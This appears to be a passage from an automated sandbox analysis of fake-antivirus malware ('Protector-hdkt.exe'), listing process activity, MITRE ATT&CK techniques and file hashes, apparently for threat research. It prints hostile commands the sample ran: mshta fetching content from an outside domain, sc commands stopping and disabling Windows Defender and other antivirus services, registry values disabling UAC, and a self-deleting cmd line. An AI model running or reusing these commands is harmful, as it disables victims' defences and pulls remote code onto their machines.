wrote to memory of 2944 2888 Protector-hdkt.exe 36 PID 2888 wrote to memory of 2944 2888 Protector-hdkt.exe 36 PID 2888 wrote to memory of 2944 2888 Protector-hdkt.exe 36 PID 2888 wrote to memory of 2732 2888 Protector-hdkt.exe 37 PID 2888 wrote to memory of 2732 2888 Protector-hdkt.exe 37 PID 2888 wrote to memory of 2732 2888 Protector-hdkt.exe 37 PID 2888 wrote to memory of 2732 2888 Protector-hdkt.exe 37 PID 2888 wrote to memory of 2360 2888 Protector-hdkt.exe 39 PID 2888 wrote to memory of 2360 2888 Protector-hdkt.exe 39 PID 2888 wrote to memory of 2360 2888 Protector-hdkt.exe 39 PID 2888 wrote to memory of 2360 2888 Protector-hdkt.exe 39 PID 2888 wrote to memory of 2044 2888 Protector-hdkt.exe 41 PID 2888 wrote to memory of 2044 2888 Protector-hdkt.exe 41 PID 2888 wrote to memory of 2044 2888 Protector-hdkt.exe 41 PID 2888 wrote to memory of 2044 2888 Protector-hdkt.exe 41 PID 2888 wrote to memory of 1048 2888 Protector-hdkt.exe 43 PID 2888 wrote to memory of 1048 2888 Protector-hdkt.exe 43 PID 2888 wrote to memory of 1048 2888 Protector-hdkt.exe 43 PID 2888 wrote to memory of 1048 2888 Protector-hdkt.exe 43 PID 2888 wrote to memory of 1832 2888 Protector-hdkt.exe 45 PID 2888 wrote to memory of 1832 2888 Protector-hdkt.exe 45 PID 2888 wrote to memory of 1832 2888 Protector-hdkt.exe 45 PID 2888 wrote to memory of 1832 2888 Protector-hdkt.exe 45 PID 2888 wrote to memory of 2020 2888 Protector-hdkt.exe 47 PID 2888 wrote to memory of 2020 2888 Protector-hdkt.exe 47 PID 2888 wrote to memory of 2020 2888 Protector-hdkt.exe 47 PID 2888 wrote to memory of 2020 2888 Protector-hdkt.exe 47 PID 2888 wrote to memory of 2728 2888 Protector-hdkt.exe 50 PID 2888 wrote to memory of 2728 2888 Protector-hdkt.exe 50 PID 2888 wrote to memory of 2728 2888 Protector-hdkt.exe 50 PID 2888 wrote to memory of 2728 2888 Protector-hdkt.exe 50 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-hdkt.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-hdkt.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-hdkt.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-hdkt.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f5403e8870e5c8be62d3e8d5b75d1124_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Users\Admin\AppData\Roaming\Protector-hdkt.exeC:\Users\Admin\AppData\Roaming\Protector-hdkt.exe2⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2888 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.updatesecstorage.info/?0=112&1=3&2=1&3=52&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=vpwgfagqiu&14=1"3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2924
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2944
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2732
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2360
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2044
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1048
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1832
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2728
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\F5403E~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2776
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
5Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD5f5403e8870e5c8be62d3e8d5b75d1124
SHA1a7558db6c81fc772773413ae6dc6680fdc996b15
SHA256d86b1e40b8cc1ef9927a6d769f19d0f55b5e3fe40742e15ecc942046f0305573
SHA51256682ae5241f6d995e18860472a88b6f921e4adf6947b745cc6968a6df551eacc1f4c4105afa2544b48b8ff8a4d76adb6f4fb1996fe179ac95739356655f1dc4